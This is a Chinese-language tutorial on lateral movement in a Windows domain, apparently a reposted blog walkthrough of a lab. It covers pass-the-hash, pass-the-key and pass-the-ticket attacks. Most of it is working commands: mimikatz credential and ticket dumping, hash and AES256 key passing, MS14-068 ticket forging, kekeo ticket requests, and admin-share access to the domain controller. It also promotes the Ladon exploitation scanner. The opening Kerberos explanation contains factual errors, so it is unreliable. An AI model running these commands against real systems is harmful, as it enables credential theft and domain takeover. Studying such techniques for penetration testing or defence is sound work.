Kerberos協議具體工作方法，在域中，簡要介紹一下：
? 客戶機將明文密碼進行NTLM哈希,然后和時間戳一起加密(使用krbtgt密碼hash作為密鑰)，發送給kdc（域控），kdc對用戶進行檢測，成功之后創建TGT(Ticket-Granting Ticket)
? 將TGT進行加密簽名返回給客戶機器，只有域用戶krbtgt才能讀取kerberos中TGT數據
? 然后客戶機將TGT發送給域控制器KDC請求TGS（票證授權服務）票證，并且對TGT進行檢測
? 檢測成功之后，將目標服務賬戶的NTLM以及TGT進行加密，將加密后的結果返回給客戶機。

PTH （pass the hash） # 利用lm或者ntlm的值進行的滲透測試
PTT （pass the ticket） # 利用的票據憑證TGT進行的滲透測試
PTK （pass the key） # 利用的ekeys aes256進行的滲透測試（ekeys aes256可以通過mimikatz中sekurlsa::ekeys獲取）

windows系統LM Hash 及NTLM Hash加密算法，個人系統在windows vista后，服務器系統在windows 2003以后，認證方式均為NTLM Hash

可以把票據理解為登錄網站后留下來的cookie，或者說和別人建立連接的一個憑據在你電腦上，這時候你就可以用這個票據進行重新連接，票據就是好比cookie

PTH和PTK連接協議是一樣的，PTT協議不同，它是kerberos協議。

PTH在內網滲透中是一種很經典的攻擊方式，原理就是攻擊者可以直接通過LM Hash和NTLM Hash遠程訪問主機或者服務，而不提供明文密碼。（也就是說不需要得到明文密碼，只需要得到加密值就可以攻擊）

如果禁用了ntlm認證，PsExec無法利用獲得的ntlm hash進行遠程連接，但是使用mimikatz還是可以攻擊成功。對于8.1/2012r2，安裝補丁kb2871997的Win 7/2008r2/8/2012等，可以使用AES keys代替NT hash來實現ptk攻擊。

總結：KB2871997補丁后的影響（systeminfo可以查看補丁信息）
pth：沒打補丁用戶都可以連接，打了補丁只能administrator連接
ptk：打了補丁才能用戶都可以連接，采用aes256連接
KB22871997是否真的能防御PTH攻擊？ - FreeBuf網絡安全行業門戶

# PTT攻擊的部分就不是簡單的NTLM認證了，它是利用Kerberos協議進行攻擊的，這里就介紹三種常見的攻擊方法：MS14-068，Golden ticket，SILVER ticket，簡單來說就是將連接合法的票據注入到內存中實現連接。

MS14-068基于漏洞，Golden ticket(黃金票據)，SILVER ticket(白銀票據)
其中Golden ticket(黃金票據)，SILVER ticket(白銀票據)屬于權限維持技術
MS14-068造成的危害是允許域內任何一個普通用戶，將自己提升至域管權限。微軟給出的補丁是kb3011780

? 域橫向移動PTH傳遞-Mimikatz
? 域橫向移動PTK傳遞-Mimikatz
? 域橫向移動PTT傳遞-MS14068&kekeo&local
? 國產Ladon內網殺器測試驗收-信息收集,連接等?

---

案例1-域橫向移動PTH傳遞-Mimikatz

?????? Pass The Hash哈希傳遞。該方法通過找到賬戶相關的密碼散列值（通常是NTLM hash）來進行攻擊。在域環境中，用戶登錄計算機時大都是域賬號，大量計算機在安裝的時候會使用相同的本地管理員賬號密碼，因此，如果計算機的本地管理賬號和密碼也是相同，攻擊者就能使用hash傳遞攻擊的方法登錄內網中其他計算機。同時，通過哈希傳遞攻擊，攻擊者不需要花費事假破解密碼散列值（進而會的明文密碼） 。

PTH(哈希傳遞pass the hash)傳遞就可以借助工具mimikatz，這款工具不僅是憑證的獲取工具，就是獲取明文密碼的工具，還可以進行相關攻擊，比如說

PTH ntlm傳遞
未打補丁下的工作組及域連接：
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7（假設知道域控上的hash）
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c（workgroup是連接本地用戶）
sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7

\OWA2010CN-God.god.org（域控）

實驗演示：

打開2008R2 x64 Webserver的powershell：

命令： privilege::debug sekurlsa::logonPasswords（獲取明文密碼）sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7（mimikatz運行后會彈出一個窗口cmd） 在彈出的窗口中輸入dir \\192.168.3.21\c$（ip地址不識別的話可以換成計算機名）

---

案例2-域橫向移動PTK傳遞-mimikatz

PTK aes256傳遞
打補丁后的工作組及域連接：
sekurlsa::ekeys #獲取aes
sekurlsa::pth /user:mary /domain:god /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

PTK：必須打了補丁才能用戶連接

---

?案例3-域橫向移動PTT傳遞-ms14068漏洞&kekeo工具&本地

第一種利用漏洞：
能實現普通用戶直接獲取域控system權限

MS14-068 powershell執行

1.查看當前sid whoami/user
2.mimikatz # kerberos::purge???? ?? //清空當前機器中所有憑證，如果有域成員憑證會影響憑證偽造（不用提升權限）
mimikatz # kerberos::list????????? ????? //查看當前機器憑證
mimikatz # kerberos::ptc 票據文件名稱 ? //將票據注入到內存中
3.利用ms14-068生成TGT數據
ms14-068.exe -u 域成員名@域名 -s sid -d 域控制器地址 -p 域成員密碼
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45
4.票據注入內存
mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit
5.查看憑證列表 klist（當前計算機和哪些東西進行連接，如果要刪除票據可以使用命令klist purge）
6.利用
dir \192.168.3.21\c$（或者net user連接）如果ip連接不了就可以用計算機名

這個票據傳遞的原理就是生成一個合法的連接請求，然后用mimikatz導入內存中，所以連接的時候就不用連接密碼

第二種利用工具kekeo

1.生成票據
kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"
2.導入票據
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
3.查看憑證 klist
4.利用net use載入
dir \192.168.3.21\c$

第三種利用本地票據(需本地管理員權限)

其實就是一種偽造cookie的攻擊思路，首先用mimikatz把本地的票據收集再導入內存

sekurlsa::tickets /export
kerberos::ptt xxxxxxxxxx.xxxx.kirbi（就相當于把以前的“cookie”弄出來，再看看還能不能用，憑據在十小時之內導出才有效）
總結：ptt傳遞不需本地管理員權限，連接時主機名連接，基于漏洞,工具,本地票據

---

案例4-國產Ladon內網殺器測試驗收

信息收集-協議掃描-漏洞探針-傳遞攻擊等

大型內網滲透掃描器&Cobalt Strike，Ladon8.9內置120個模塊，包含信息收集/存活主機/端口掃描/服務識別/密碼爆破/漏洞檢測/漏洞利用。漏洞檢測含MS17010/SMBGhost/Weblogic/ActiveMQ/Tomcat/Struts2，密碼口令爆破(Mysql/Oracle/MSSQL)/FTP/SSH(Linux)/VNC/Windows(IPC/WMI/SMB/Netbios/LDAP/SmbHash/WmiHash/Winrm),遠程執行命令(smbexec/wmiexe/psexec/atexec/sshexec/webshell),降權提權Runas、GetSystem，Poc/Exploit,支持Cobalt Strike 3.X-4.0

GitHub - k8gege/Ladon at v6.1

涉及資源:
https://github.com/k8gege/Ladon
https://github.com/gentilkiwi/kekeo/releases
https://github.com/abatchy17/indowsExploits/tree/master/MS14-068
https://pan.baidu.com/s/1Vh4ELTFvyBhv3Avzft1fCw提取碼:xiao

總結

以上是生活随笔為你收集整理的【内网安全】域横向PTHPTKPTT哈希票据传递的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。